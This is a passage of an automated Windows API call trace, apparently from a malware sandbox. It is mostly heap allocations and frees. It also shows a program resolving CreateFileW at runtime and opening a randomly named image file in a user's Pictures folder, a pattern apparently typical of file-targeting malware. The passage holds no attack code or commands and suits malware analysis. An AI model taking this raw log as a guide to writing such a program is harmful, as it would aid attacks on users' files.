HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0092.871] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.874] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.877] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.877] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0092.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0092.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.878] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0092.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.878] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\9Y-cpSQgv6l3vMS-rl5.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\9y-cpsqgv6l3vms-rl5.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.879] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e478 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.880] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.881] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.881] HeapFree (in: 